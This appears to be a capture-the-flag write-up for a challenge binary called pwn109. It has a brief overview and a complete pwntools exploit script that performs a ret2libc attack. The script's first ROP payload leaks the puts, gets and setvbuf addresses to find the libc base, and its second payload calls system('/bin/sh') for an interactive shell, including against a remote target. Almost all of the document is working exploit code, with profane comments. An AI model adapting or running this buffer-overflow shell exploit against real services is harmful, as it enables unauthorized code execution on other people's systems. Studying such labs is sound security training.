Overview

ret2libc attack, leaking out puts, gets, and setvbuf libc functions. Find the libc file at https://libc.rip/. replace libc = elf.libc #only when doing it locally with libc = ELF("./libc6_2.27-3ubuntu1.3_amd64.so") the libc file found at the website.

Exploit

from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
# Set up pwntools for the correct architecture
exe = './pwn109.pwn109'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# libc = elf.libc
libc = ELF("./libc6_2.27-3ubuntu1.3_amd64.so")
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'info'
# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================
io = start()
# used ropper to find the gadgets
ret = p64(0x000000000040101a) 
pop_rdi = p64(0x00000000004012a3)

# leaking out the functions
plt_puts = p64(elf.plt.puts)
got_gets = p64(elf.got.gets)
got_setvbuf = p64(elf.got.setvbuf)
got_puts = p64(elf.got.puts)


padding = b'A'*40
# first payload
payload = padding
payload += pop_rdi + got_puts + plt_puts
payload += pop_rdi + got_gets + plt_puts
payload += pop_rdi + got_setvbuf + plt_puts
payload += p64(elf.symbols.main)
# timeout so the fucking box doesnt crash
io.recvline_containsS("Go ahead", timeout=3)
print("Injecting malicious input (1)")
io.sendline(payload)
# fucking box output fucking weird man
out = io.recv().split(b'\n')
out2 = io.recv().split(b'\n')

# print(out)
# print(out2)
# output format
leaked_puts = u64(out[0].ljust(8,b"\x00"))
leaked_gets = u64(out2[1].ljust(8,b"\x00"))
leaked_setvbuf = u64(out2[2].ljust(8,b"\x00"))

log.info("Leaked Gets: "+ str(hex(leaked_gets)))
log.info("Leaked setvbuf: "+ str(hex(leaked_setvbuf)))
log.info("Leaked puts: "+ str(hex(leaked_puts)))
# set the base libc address
libc.address = leaked_gets - libc.symbols.gets
log.info("base Libc: "+ str(hex(libc.address)))
# final payload
payload = padding
payload +=  pop_rdi + p64(next(libc.search(b"/bin/sh"))) + ret + p64(libc.symbols.system)

io.recvline_containsS("Go ahead", timeout=3)
print("Injecting malicious input (2)")
io.sendline(payload)
io.interactive()